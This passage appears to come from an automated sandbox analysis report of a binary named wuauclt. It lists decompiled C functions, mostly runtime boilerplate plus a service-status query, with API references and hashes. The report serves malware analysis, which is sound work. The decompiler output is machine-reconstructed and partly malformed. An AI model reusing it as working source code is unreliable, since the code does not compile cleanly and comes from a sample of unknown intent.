                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0025B361,0025B361,?,?,?,00262A29,00000001,00000001,93E85006), ref: 00262832
                                                • __alloca_probe_16.LIBCMT ref: 0026286A
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00262A29,00000001,00000001,93E85006,?,?,?), ref: 002628B8
                                                • __alloca_probe_16.LIBCMT ref: 0026294F
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,93E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002629B2
                                                • __freea.LIBCMT ref: 002629BF
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                • __freea.LIBCMT ref: 002629C8
                                                • __freea.LIBCMT ref: 002629ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                • String ID:
                                                • API String ID: 2597970681-0
                                                • Opcode ID: 5954acddb30467f9323d9a6ea696c144929fb8db501dfe310b27d118e2920cdf
                                                • Instruction ID: 35d8d571c2ef2f20fd232d8cd365b3b0e05ed05380d17d079ef4efef7c0fd702
                                                • Opcode Fuzzy Hash: 5954acddb30467f9323d9a6ea696c144929fb8db501dfe310b27d118e2920cdf
                                                • Instruction Fuzzy Hash: 2651C072A21617EBDB258F64CC45EBF77A9EB84750F244669FC04E6140DB34DCE8CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00261F18(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed char _v15;
                                                				char _v16;
                                                				void _v24;
                                                				short _v28;
                                                				char _v31;
                                                				void _v32;
                                                				long _v36;
                                                				intOrPtr _v40;
                                                				void* _v44;
                                                				signed int _v48;
                                                				signed char* _v52;
                                                				long _v56;
                                                				int _v60;
                                                				void* __esi;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				int _t86;
                                                				void* _t94;
                                                				long _t97;
                                                				void _t105;
                                                				void* _t112;
                                                				signed int _t116;
                                                				signed int _t118;
                                                				signed char _t123;
                                                				signed char _t128;
                                                				intOrPtr _t129;
                                                				signed int _t131;
                                                				signed char* _t133;
                                                				intOrPtr* _t134;
                                                				signed int _t135;
                                                				void* _t136;
                                                
                                                				_t78 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t78 ^ _t135;
                                                				_t80 = _a8;
                                                				_t118 = _t80 >> 6;
                                                				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                				_t133 = _a12;
                                                				_v52 = _t133;
                                                				_v48 = _t118;
                                                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x273b90 + _t118 * 4)) + _t116 + 0x18));
                                                				_v40 = _a16 + _t133;
                                                				_t86 = GetConsoleCP();
                                                				_t134 = _a4;
                                                				_v60 = _t86;
                                                				 *_t134 = 0;
                                                				 *((intOrPtr*)(_t134 + 4)) = 0;
                                                				 *((intOrPtr*)(_t134 + 8)) = 0;
                                                				while(_t133 < _v40) {
                                                					_v28 = 0;
                                                					_v31 =  *_t133;
                                                					_t129 =  *((intOrPtr*)(0x273b90 + _v48 * 4));
                                                					_t123 =  *(_t129 + _t116 + 0x2d);
                                                					if((_t123 & 0x00000004) == 0) {
                                                						if(( *(E0025F55F(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                							_push(1);
                                                							_push(_t133);
                                                							goto L8;
                                                						} else {
                                                							if(_t133 >= _v40) {
                                                								_t131 = _v48;
                                                								 *((char*)( *((intOrPtr*)(0x273b90 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                								 *( *((intOrPtr*)(0x273b90 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x273b90 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                							} else {
                                                								_t112 = E0025E1BE( &_v28, _t133, 2);
                                                								_t136 = _t136 + 0xc;
                                                								if(_t112 != 0xffffffff) {
                                                									_t133 =  &(_t133[1]);
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t128 = _t123 & 0x000000fb;
                                                						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                						_push(2);
                                                						_v15 = _t128;
                                                						 *(_t129 + _t116 + 0x2d) = _t128;
                                                						_push( &_v16);
                                                						L8:
                                                						_push( &_v28);
                                                						_t94 = E0025E1BE();
                                                						_t136 = _t136 + 0xc;
                                                						if(_t94 != 0xffffffff) {
                                                							L9:
                                                							_t133 =  &(_t133[1]);
                                                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                							_v56 = _t97;
                                                							if(_t97 != 0) {
                                                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                									L19:
                                                									 *_t134 = GetLastError();
                                                								} else {
                                                									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
                                                									if(_v36 >= _v56) {
                                                										if(_v31 != 0xa) {
                                                											goto L16;
                                                										} else {
                                                											_t105 = 0xd;
                                                											_v32 = _t105;
                                                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                												goto L19;
                                                											} else {
                                                												if(_v36 >= 1) {
                                                													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
                                                													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                													goto L16;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L20;
                                                					L16:
                                                				}
                                                				L20:
                                                				return E00257097(_v8 ^ _t135, _t134);
                                                			}




































                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0026268D,?,00000000,?,00000000,00000000), ref: 00261F5A
                                                • __fassign.LIBCMT ref: 00261FD5
                                                • __fassign.LIBCMT ref: 00261FF0
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00262016
                                                • WriteFile.KERNEL32(?,?,00000000,0026268D,00000000,?,?,?,?,?,?,?,?,?,0026268D,?), ref: 00262035
                                                • WriteFile.KERNEL32(?,?,00000001,0026268D,00000000,?,?,?,?,?,?,?,?,?,0026268D,?), ref: 0026206E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 48e69239c3122e48361bab2261c8ebf62f3f76646d4c94b8dc72ce3a3f8bdfbf
                                                • Instruction ID: 4f8f41585790d8c0e12b1e6859c17262f3d0e7f759472e3719ccff203e93dd9b
                                                • Opcode Fuzzy Hash: 48e69239c3122e48361bab2261c8ebf62f3f76646d4c94b8dc72ce3a3f8bdfbf
                                                • Instruction Fuzzy Hash: FB51E670A1024ADFCF10CFA8D845BEEBBF8EF19301F14411AE955E7291E771AA94CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00260C52(intOrPtr _a4) {
                                                				void* _t18;
                                                
                                                				_t45 = _a4;
                                                				if(_a4 != 0) {
                                                					E00260C16(_t45, 7);
                                                					E00260C16(_t45 + 0x1c, 7);
                                                					E00260C16(_t45 + 0x38, 0xc);
                                                					E00260C16(_t45 + 0x68, 0xc);
                                                					E00260C16(_t45 + 0x98, 2);
                                                					E0025D2F4( *((intOrPtr*)(_t45 + 0xa0)));
                                                					E0025D2F4( *((intOrPtr*)(_t45 + 0xa4)));
                                                					E0025D2F4( *((intOrPtr*)(_t45 + 0xa8)));
                                                					E00260C16(_t45 + 0xb4, 7);
                                                					E00260C16(_t45 + 0xd0, 7);
                                                					E00260C16(_t45 + 0xec, 0xc);
                                                					E00260C16(_t45 + 0x11c, 0xc);
                                                					E00260C16(_t45 + 0x14c, 2);
                                                					E0025D2F4( *((intOrPtr*)(_t45 + 0x154)));
                                                					E0025D2F4( *((intOrPtr*)(_t45 + 0x158)));
                                                					E0025D2F4( *((intOrPtr*)(_t45 + 0x15c)));
                                                					return E0025D2F4( *((intOrPtr*)(_t45 + 0x160)));
                                                				}
                                                				return _t18;
                                                			}





                                                APIs
                                                  • Part of subcall function 00260C16: _free.LIBCMT ref: 00260C3F
                                                • _free.LIBCMT ref: 00260CA0
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 00260CAB
                                                • _free.LIBCMT ref: 00260CB6
                                                • _free.LIBCMT ref: 00260D0A
                                                • _free.LIBCMT ref: 00260D15
                                                • _free.LIBCMT ref: 00260D20
                                                • _free.LIBCMT ref: 00260D2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 5eb01aa081a1f9e1795e076d4a6d6ea7148062038bb8dfa32c9dcc9acbfe695a
                                                • Instruction ID: ca03b7bb0970ec6f34221b3943dd5cb5acba9866e23d66b5592abe268b898871
                                                • Opcode Fuzzy Hash: 5eb01aa081a1f9e1795e076d4a6d6ea7148062038bb8dfa32c9dcc9acbfe695a
                                                • Instruction Fuzzy Hash: F91154B1550B09AAE530BBB0CC47FCB779D5F10700F400E16B699A6053DB75F9A55E50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E0025E9EA(void* __ecx) {
                                                				intOrPtr _t2;
                                                				void* _t4;
                                                				void* _t10;
                                                				void* _t11;
                                                				void* _t13;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t11 = __ecx;
                                                				_t16 = GetLastError();
                                                				_t10 = 0;
                                                				_t2 =  *0x272524; // 0x6
                                                				_t19 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t15 = E0025D3BF(_t11, 1, 0x364);
                                                					_pop(_t13);
                                                					if(_t15 != 0) {
                                                						_t4 = E0025D74F(_t13, __eflags,  *0x272524, _t15);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E0025E7D8(_t13, _t15, "(%'");
                                                							E0025D2F4(_t10);
                                                							__eflags = _t15;
                                                							if(_t15 != 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t15);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t10);
                                                						L4:
                                                						E0025D2F4();
                                                						L8:
                                                						SetLastError(_t16);
                                                					}
                                                				} else {
                                                					_t15 = E0025D6F9(_t11, _t19, _t2);
                                                					if(_t15 != 0) {
                                                						L9:
                                                						SetLastError(_t16);
                                                						_t10 = _t15;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                				return _t10;
                                                			}











                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,0025D49A,0025D411,?,0025E994,00000001,00000364,?,0025A9FA,?,?,?,0025A5BB,?), ref: 0025E9EF
                                                • _free.LIBCMT ref: 0025EA24
                                                • _free.LIBCMT ref: 0025EA4B
                                                • SetLastError.KERNEL32(00000000), ref: 0025EA58
                                                • SetLastError.KERNEL32(00000000), ref: 0025EA61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID: (%'
                                                • API String ID: 3170660625-2229709766
                                                • Opcode ID: 6cbbc7a43f39d8e892bae1498c43b3746e3718839f2ff3ec30911fa011b27647
                                                • Instruction ID: bda52bbbaf0dd6b6833f4c6354c4e49aa1efcc23235cf88ffc5fbeafd783f87d
                                                • Opcode Fuzzy Hash: 6cbbc7a43f39d8e892bae1498c43b3746e3718839f2ff3ec30911fa011b27647
                                                • Instruction Fuzzy Hash: 2E012876130611679A2AB7347C49A5F225DEBC5373B320015FC19D2141DF70CE7D451C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00259860(void* __ecx) {
                                                				void* _t5;
                                                				void* _t6;
                                                				void* _t9;
                                                				void* _t15;
                                                				long _t16;
                                                				void* _t17;
                                                				void* _t20;
                                                				void* _t21;
                                                
                                                				if( *0x272450 != 0xffffffff) {
                                                					_t16 = GetLastError();
                                                					_t20 = E00259FEB(__eflags,  *0x272450);
                                                					_t9 = _t15;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = E0025D3BF(_t9, 1, 0x28);
                                                						__eflags = _t21;
                                                						if(__eflags == 0) {
                                                							L6:
                                                							SetLastError(_t16);
                                                							_t17 = 0;
                                                						} else {
                                                							_t6 = E0025A025(__eflags,  *0x272450, _t21);
                                                							__eflags = _t6;
                                                							if(_t6 != 0) {
                                                								SetLastError(_t16);
                                                								_t17 = _t21;
                                                								_t21 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								goto L6;
                                                							}
                                                						}
                                                						E0025D2F4(_t21);
                                                						_t5 = _t17;
                                                					} else {
                                                						SetLastError(_t16);
                                                						_t5 = _t20;
                                                					}
                                                					return _t5;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}












                                                APIs
                                                • GetLastError.KERNEL32(?,?,00259857,00258FE1,0026F858,00000010,002587AC,?,?,?,?,?,00000000,?), ref: 0025986E
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0025987C
                                                • SetLastError.KERNEL32(00000000,00000000,?), ref: 00259889
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: 8740b0e7b293fd8458b279dc5ffa41c397e5fa20e9cfc27aa0cb43ebe070746e
                                                • Instruction ID: 73ebe72aea633e25f898d6b486a7ef0feed9d5e9dedad0f3f1cff6c4ecd9146c
                                                • Opcode Fuzzy Hash: 8740b0e7b293fd8458b279dc5ffa41c397e5fa20e9cfc27aa0cb43ebe070746e
                                                • Instruction Fuzzy Hash: EEF0F436525632DB96212B36BC0D56A276DEB87B337250129FC0896190DF7048DE9698
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0025D04E(signed int __ecx) {
                                                				intOrPtr _t7;
                                                
                                                				asm("lock xadd [eax], ecx");
                                                				if((__ecx | 0xffffffff) == 0) {
                                                					_t7 =  *0x272b08; // 0x14c9348
                                                					if(_t7 != 0x2728e8) {
                                                						E0025D2F4(_t7);
                                                						 *0x272b08 = 0x2728e8;
                                                					}
                                                				}
                                                				E0025D2F4( *0x273d98);
                                                				 *0x273d98 = 0;
                                                				E0025D2F4( *0x273d9c);
                                                				 *0x273d9c = 0;
                                                				E0025D2F4( *0x273a80);
                                                				 *0x273a80 = 0;
                                                				E0025D2F4( *0x273a84);
                                                				 *0x273a84 = 0;
                                                				return 1;
                                                			}





                                                APIs
                                                • _free.LIBCMT ref: 0025D06C
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 0025D07E
                                                • _free.LIBCMT ref: 0025D091
                                                • _free.LIBCMT ref: 0025D0A2
                                                • _free.LIBCMT ref: 0025D0B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID: ('
                                                • API String ID: 776569668-476483421
                                                • Opcode ID: d17c56a06f428505e57bd51d6a6614a06f886c4963dbd69c2f1bef1c441e9e69
                                                • Instruction ID: 9e0bc08d86fd0a6f9f056a8b5ad5a92b66efc4275b999cceb5ecd922ab94cb14
                                                • Opcode Fuzzy Hash: d17c56a06f428505e57bd51d6a6614a06f886c4963dbd69c2f1bef1c441e9e69
                                                • Instruction Fuzzy Hash: 4BF0D0B08201229B8732EF14BC4B4483B60F704725B05051AFC5C96675CB714EEAEFC5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E00254AE0(void* __ebx, void* __ecx, void* __edi) {
                                                				signed int _v8;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				char _v48;
                                                				void* __esi;
                                                				signed int _t9;
                                                				void* _t20;
                                                				void* _t33;
                                                				void* _t34;
                                                				signed int _t36;
                                                
                                                				_t9 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t9 ^ _t36;
                                                				_t34 = __ecx;
                                                				_t33 = OpenSCManagerA(0, 0, 4);
                                                				if(_t33 == 0) {
                                                					L3:
                                                					return E00257097(_v8 ^ _t36, _t34);
                                                				} else {
                                                					_t34 = OpenServiceA(_t33, _t34, 4);
                                                					if(_t34 != 0) {
                                                						__imp__QueryServiceStatusEx(0,  &_v44, 0x24,  &_v48, __ebx);
                                                						CloseServiceHandle(_t34);
                                                						CloseServiceHandle(_t33);
                                                						_t20 =  ==  ? 0 : _v40;
                                                						return E00257097(_v8 ^ _t36, CloseServiceHandle, _t34);
                                                					} else {
                                                						CloseServiceHandle(_t33);
                                                						goto L3;
                                                					}
                                                				}
                                                			}














                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 00254AFA
                                                • OpenServiceA.ADVAPI32(00000000,?,00000004), ref: 00254B0A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000004), ref: 00254B17
                                                • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,00000004), ref: 00254B3D
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00000004), ref: 00254B4F
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00000004), ref: 00254B52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ManagerQueryStatus
                                                • String ID:
                                                • API String ID: 742736292-0
                                                • Opcode ID: 764f43fd893e7463f4527100855dce19fabb41e6463ce11a459b3f97e019381f
                                                • Instruction ID: fe59fc58fae7ea5348eabdd44ad2ef37f3a46d218954fe8e43deaef238a604cd
                                                • Opcode Fuzzy Hash: 764f43fd893e7463f4527100855dce19fabb41e6463ce11a459b3f97e019381f
                                                • Instruction Fuzzy Hash: 9C01A132A41118ABD7109B78AC49FFE7BECDF49625F00006AFD05E7280DE71DC448A94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E002593E0(void* __ebx, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				char _v32;
                                                				intOrPtr* _v40;
                                                				void* __edi;
                                                				void* _t56;
                                                				char _t58;
                                                				signed int _t64;
                                                				intOrPtr _t65;
                                                				void* _t66;
                                                				intOrPtr _t69;
                                                				intOrPtr _t71;
                                                				intOrPtr _t72;
                                                				intOrPtr* _t75;
                                                				intOrPtr _t78;
                                                				signed int _t83;
                                                				char _t85;
                                                				intOrPtr* _t89;
                                                				intOrPtr* _t90;
                                                				intOrPtr _t94;
                                                				void* _t101;
                                                				void* _t103;
                                                				intOrPtr _t104;
                                                				intOrPtr* _t106;
                                                				intOrPtr _t109;
                                                				intOrPtr _t111;
                                                				intOrPtr* _t113;
                                                				void* _t116;
                                                				void* _t117;
                                                				void* _t124;
                                                
                                                				_push(__ebx);
                                                				_t78 = _a8;
                                                				_push(__esi);
                                                				_push(_t103);
                                                				_v5 = 0;
                                                				_t109 = _t78 + 0x10;
                                                				_push(_t109);
                                                				_v16 = 1;
                                                				_v20 = _t109;
                                                				_v12 =  *(_t78 + 8) ^  *0x271004;
                                                				_t56 = E002593A0(_t78, _t103, _t109,  *(_t78 + 8) ^  *0x271004);
                                                				_t104 = _a12;
                                                				_push(_t104);
                                                				E00257957(_t56);
                                                				_t58 = _a4;
                                                				_t117 = _t116 + 0xc;
                                                				if(( *(_t58 + 4) & 0x00000066) != 0) {
                                                					__eflags =  *((intOrPtr*)(_t78 + 0xc)) - 0xfffffffe;
                                                					if( *((intOrPtr*)(_t78 + 0xc)) != 0xfffffffe) {
                                                						E0025A247(_t78, 0xfffffffe, _t109, 0x271004);
                                                						goto L18;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					_v32 = _t58;
                                                					_v28 = _t104;
                                                					_t104 =  *((intOrPtr*)(_t78 + 0xc));
                                                					 *((intOrPtr*)(_t78 - 4)) =  &_v32;
                                                					if(_t104 == 0xfffffffe) {
                                                						L19:
                                                						return _v16;
                                                					} else {
                                                						do {
                                                							_t83 = _v12;
                                                							_t19 = _t104 + 2; // 0x3
                                                							_t64 = _t104 + _t19 * 2;
                                                							_t78 =  *((intOrPtr*)(_t83 + _t64 * 4));
                                                							_t65 = _t83 + _t64 * 4;
                                                							_t84 =  *((intOrPtr*)(_t65 + 4));
                                                							_v24 = _t65;
                                                							if( *((intOrPtr*)(_t65 + 4)) == 0) {
                                                								_t85 = _v5;
                                                								goto L12;
                                                							} else {
                                                								_t66 = E0025A1FE(_t84, _t109);
                                                								_t85 = 1;
                                                								_v5 = 1;
                                                								_t124 = _t66;
                                                								if(_t124 < 0) {
                                                									_v16 = 0;
                                                									L18:
                                                									_push(_t109);
                                                									E002593A0(_t78, _t104, _t109, _v12);
                                                									goto L19;
                                                								} else {
                                                									if(_t124 <= 0) {
                                                										goto L12;
                                                									} else {
                                                										_t67 = _a4;
                                                										if( *_a4 == 0xe06d7363) {
                                                											_t126 =  *0x269558;
                                                											if( *0x269558 != 0) {
                                                												_t67 = E002673A0(_t126, 0x269558);
                                                												_t117 = _t117 + 4;
                                                												if(_t67 != 0) {
                                                													_t113 =  *0x269558; // 0x2584a4
                                                													L00257B59();
                                                													_t67 =  *_t113(_a4, 1);
                                                													_t109 = _v20;
                                                													_t117 = _t117 + 8;
                                                												}
                                                											}
                                                										}
                                                										E0025A22E(_t67, _a8, _a4);
                                                										_t69 = _a8;
                                                										if( *((intOrPtr*)(_t69 + 0xc)) != _t104) {
                                                											E0025A247(_t69, _t104, _t109, 0x271004);
                                                											_t69 = _a8;
                                                										}
                                                										_push(_t109);
                                                										 *((intOrPtr*)(_t69 + 0xc)) = _t78;
                                                										E002593A0(_t78, _t104, _t109, _v12);
                                                										E0025A215();
                                                										asm("int3");
                                                										_push(_t104);
                                                										_t106 = _v40;
                                                										if( *((char*)(_t106 + 4)) == 0) {
                                                											L29:
                                                											_t89 = _a4;
                                                											_t71 =  *_t106;
                                                											 *_t89 = _t71;
                                                											 *((char*)(_t89 + 4)) = 0;
                                                										} else {
                                                											_t90 =  *_t106;
                                                											if(_t90 == 0) {
                                                												goto L29;
                                                											} else {
                                                												_t101 = _t90 + 1;
                                                												do {
                                                													_t72 =  *_t90;
                                                													_t90 = _t90 + 1;
                                                												} while (_t72 != 0);
                                                												_push(_t78);
                                                												_push(_t109);
                                                												_t80 = _t90 - _t101 + 1;
                                                												_push(_t90 - _t101 + 1);
                                                												_t111 = E0025B87D(_t90 - _t101);
                                                												if(_t111 != 0) {
                                                													E0025BAB2(_t111, _t80,  *_t106);
                                                													_t75 = _a4;
                                                													_t94 = _t111;
                                                													_t111 = 0;
                                                													 *_t75 = _t94;
                                                													 *((char*)(_t75 + 4)) = 1;
                                                												}
                                                												_t71 = E0025B878(_t111);
                                                											}
                                                										}
                                                										return _t71;
                                                									}
                                                								}
                                                							}
                                                							goto L31;
                                                							L12:
                                                							_t104 = _t78;
                                                							__eflags = _t78 - 0xfffffffe;
                                                						} while (_t78 != 0xfffffffe);
                                                						__eflags = _t85;
                                                						if(_t85 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                				L31:
                                                			}


                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0025940B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00259485
                                                  • Part of subcall function 002673A0: __FindPESection.LIBCMT ref: 002673F9
                                                • _ValidateLocalCookies.LIBCMT ref: 002594F9
                                                • _ValidateLocalCookies.LIBCMT ref: 00259524
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
